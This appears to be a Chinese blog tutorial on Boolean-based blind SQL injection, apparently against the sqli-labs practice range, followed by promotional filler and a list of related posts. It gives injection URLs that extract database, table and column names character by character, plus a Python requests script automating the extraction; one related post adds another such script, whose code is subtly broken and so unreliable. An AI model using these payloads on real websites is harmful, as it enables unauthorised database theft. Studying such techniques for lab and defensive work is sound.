Python自动化sql注入:布尔盲注_布尔盲注脚本

于 2024-04-30 18:33:04 发布
阅读量121 收藏 3
点赞数 6
分类专栏: 程序员 文章标签: python 自动化 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84140080/article/details/138353983
版权

单引号就能闭合,结果正常时会显示you are in…,结果不正常什么都没有。

所以我们只需要根据是否有you are in来判断注入成功与否,构造语句如下:

# 判断数据库名长度
/?id=1' and length((select database()))=8--+

# 挨个判断数据库名
/?id=1' and ascii(substr((select database()),1,1))=115--+
# 第一位为's'
/?id=1' and ascii(substr((select database()),2,1))=102--+
# 第二位为'e'
...

# 判断表名
/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102--+

# 判断字段名
/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='表名' limit 1,1),1,1))=102--+

# 判断值
/?id=1' and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1--+
python脚本自动化

可以看到手注需要一个一个试工作量是非常非常巨大的,这时候一个python脚本就可以很好的解放我们的双手:

需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…":

import requests


requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
flag = 'You are in...'

获取数据库相关信息:

def GetDBName(url):
    DBName = ''
    print("开始获取数据库名长度...")
    len = 0
    for l in range(1,99):
        payload = f"' and length((select database()))={l}--+"
        res = conn.get(url=url+payload)
        if flag in res.content.decode("utf-8"):
            print("数据库名长度为:"+str(l))
            len = l
            break
    print("开始获取数据库名...")
    for i in range(1, len+1):
        for j in range(33,127):
            payload = f"' and ascii(substr((select database()),{i},1))={j}--+"
            res = conn.get(url=url+payload)
            if flag in res.content.decode("utf-8"):
                DBName += chr(j)
                print(DBName)
                break
    return DBName

将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。运行结果如下所示:

接下来就是获取表、字段以及其中的具体数据了,写下去你会发现总体流程都是一样的,以表为例,大致步骤如下:

获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名

代码如下:

def GetTables(url,db):
    print("正在获取数据表数量")
    tnum = 0


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210511152217670.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3poaWd1aWd1,size_16,color_FFFFFF,t_70)

**感谢每一个认真阅读我文章的人,看着粉丝一路的上涨和关注,礼尚往来总是要有的:**



① 2000多本Python电子书(主流和经典的书籍应该都有了)

② Python标准库资料(最全中文版)

③ 项目源码(四五十个有趣且经典的练手项目及源码)

④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)

⑤ Python学习路线图(告别不入流的学习)




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化学习资料的朋友,可以戳这里无偿获取](https://bbs.csdn.net/topics/618317507)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84140080
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
布尔python脚本.zip
12-28
GET和POST型python脚本
Python自动化sql注入布尔
qq_46145027的博客
04-22 3492
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔的基本流程:演示靶场:sqli-labs。
SQL注入(小白的学习)
lgsyydsa的博客
06-04 577
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
SQL注入——布尔 / Python 脚本爆破
weixin_51559599的博客
11-06 1014
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
写一个布尔的脚本
weixin_35752645的博客
01-01 488
布尔是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
布尔.py_sqlpython_
10-03
在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,它显然是用于演示或执行SQL的工具。 在SQL中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL注入之基于布尔详解
09-10
在实际操作中,由于手动进行布尔非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
手工辅助注入工具Blind-SQL-Injector.zip
07-18
2. **智能推理**:根据响应时间和页面内容的变化,自动推断出SQL语句的真假结果,帮助用户识别潜在的SQL注入点。 3. **多种注入技术**:支持基于时间的和基于布尔的两种方式,以及更复杂的注入策略。 4. **...
基于python布尔爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1837
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
python布尔的脚本
kiihuang的博客
03-28 500
使用python,编写一个可以自动爆破的布尔注脚本,根据不同情况调整里面的Content-Length的值。
布尔(ctfhub)
2401_82985722的博客
03-27 994
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
SQL注入布尔
qq_45557130的博客
10-04 747
sql注入布尔
Bool注脚
Forever_Han13的博客
01-21 646
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL,包括注脚本)
weixin_45116657的博客
08-25 4582
目录: 一、SQL SQLSQL注入的区别; SQL的过程; 二、实验环境 三、实验过程 基于布尔值的; 基于时间的; 一、SQL简介 1、SQLSQL Injection(Blind),即SQL,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工思路: 手工的过程,就像你和机器人聊天一样,这个机器人知道的...
词达人小工具2
最新发布
m0_61369360的博客
04-27 277
【代码】词达人小工具2。
SQLpython脚本编写
nobugnomoney的博客
05-18 3487
1、什么是 就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为。从 background-1 中,我们可以知道分为三类 基于布尔 SQL 基于时间的 SQL 基于报错的 SQL 0x01.基于布尔 SQL ----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
SQLpython脚本自动化注入
菜鸟学安全的博客
12-18 1383
sql无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入
布尔 python
08-28
布尔是一种注入攻击技术,它利用了应用程序对数据库是否返回正确或错误的响应来获取敏感信息。在Python中实现布尔可以通过发送恶意注入字符串并观察响应来判断条件是否为真或为假。 一种常见的方法是通过发送特定的SQL语句,如UNION SELECT语句或布尔表达式,来获取数据库中的信息。在布尔中,我们通过不断尝试不同的条件,观察应用程序的响应是否发生变化来推测正确的条件。 下面是一个简单的Python脚本示例,用于实现布尔: ```python import requests def is_true(payload): url = "http://example.com/vulnerable_page" response = requests.get(url + "?param=" + payload) if "True condition" in response.text: return True else: return False def blind_sql_injection(): result = "" for i in range(1, 10): payload = f"1' OR (SELECT SUBSTRING(database(), {i}, 1)='x') --" if is_true(payload): result += chr(i) else: break return result database_name = blind_sql_injection() print(database_name) ``` 在这个示例中,我们使用了requests库发送GET请求,并在payload中注入了恶意字符串。通过不断尝试不同的条件,我们可以逐个字符地获取数据库名。 请意,这只是一个简单的示例,实际的布尔攻击可能需要更复杂的技术和策略。同时,务必遵守法律和道德准则,在授权范围内使用布尔技术。<span class="em">1</span> #### 引用[.reference_title] - *1* [布尔python脚本](https://download.csdn.net/download/qq_46145027/87716310)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值